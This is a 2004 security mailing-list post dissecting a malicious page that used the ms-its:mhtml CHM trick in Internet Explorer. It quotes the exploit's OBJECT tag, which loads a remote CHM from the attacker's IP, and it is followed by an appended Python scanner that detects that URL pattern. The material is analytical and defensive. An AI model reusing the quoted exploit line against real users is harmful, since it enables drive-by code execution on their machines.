[Dshield] FW: Osama Bin Laden Captured
peteoutside at yahoo.com
Fri Apr 23 18:29:22 GMT 2004
The ActiveX objects call the script S, which has two lines:
The first line defines the variable "s" as a substring of variable "location.href" (the current URL in the browser window--in this case, http://220.127.116.11/pics/) starting at position 7 (i.e. excluding the http:// portion).
The second line returns ANOTHER substring of the resulting text ("18.104.22.168/pics") starting at position 0 and going to however long it is to the first instance of "/"...so you end up with this:
object data=ms-its:mhtml:file://c:\foo.mht!http://22.214.171.124/pics.chm::/pics.htm type=text/x-scriptlet
I also don't know why the first attempt occurs inside a textarea...
As far as the exploit goes, essentially what's happening is the browser is extracting foo.mht from pics.chm and executing it as C:\pics.htm, correct? And this can be any kind of executable content? Have I got this right?
Couple of questions:
1. Could you just use a browser redirect to start this process or is it essential that the user click on the link?
2. Does the process by which the hostile content is retrieved need to be in an OBJECT tag or can it be in any data request (e.g. an IMG tag)?
3. Why does one attempt in this example occur in a textarea?
Hope someone can help.
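
As an added example (not part of the original post or of the page it analyses), here is one way a defender could scan captured HTML for the URL shape quoted above and split it into its parts. The function names, the sample page and the documentation addresses are constructed for illustration, and the "its:" and "mk:@MSITStore:" handler aliases are an addition not mentioned in the post.

```python
import re
from urllib.parse import urlsplit

# URL shape quoted in the post:
#   ms-its:mhtml:file://<local .mht>!<remote .chm URL>::<path inside the CHM>
# "its:" and "mk:@MSITStore:" are aliases for the same InfoTech Storage handler.
ITS_MHTML = re.compile(
    r"""(?P<handler>ms-its|its|mk:@MSITStore):mhtml:
        (?P<local>file://[^!\s"'<>]+)!
        (?P<remote>https?://[^\s"'<>]+?)::
        (?P<inner>/[^\s"'<>]*)""",
    re.IGNORECASE | re.VERBOSE,
)

def host_as_script_derives(href):
    """Mirror the two substring steps the post describes for script S."""
    s = href[7:]                 # step 1: drop the leading "http://"
    end = s.find("/")            # step 2: cut at the first "/"
    return s[:end] if end > 0 else ""

def scan(html, page_url):
    """Return one finding per ms-its:mhtml reference that names a remote file."""
    page_host = host_as_script_derives(page_url)
    findings = []
    for m in ITS_MHTML.finditer(html):
        remote_host = urlsplit(m["remote"]).netloc
        findings.append({
            "handler": m["handler"].lower(),
            "local": m["local"],
            "remote": m["remote"],
            "inner": m["inner"],
            # True when the remote file comes from the host serving the page
            "same_host_as_page": remote_host.lower() == page_host.lower(),
        })
    return findings

# Constructed sample page (192.0.2.10 and 198.51.100.7 are documentation
# addresses), with one reference inside a <textarea> as the post mentions.
SAMPLE_URL = "http://192.0.2.10/pics/"
SAMPLE_HTML = r"""
<textarea><object data=ms-its:mhtml:file://c:\foo.mht!http://192.0.2.10/pics.chm::/pics.htm type=text/x-scriptlet></object></textarea>
<object data="MS-ITS:mhtml:file://c:\foo.mht!http://198.51.100.7/pics.chm::/pics.htm" type="text/x-scriptlet"></object>
<a href="http://192.0.2.10/pics/readme.htm">plain link, not flagged</a>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML, SAMPLE_URL):
        print(finding)
```

The scan works on raw text rather than a parsed DOM, so a reference placed inside a textarea is reported the same way as one in live markup.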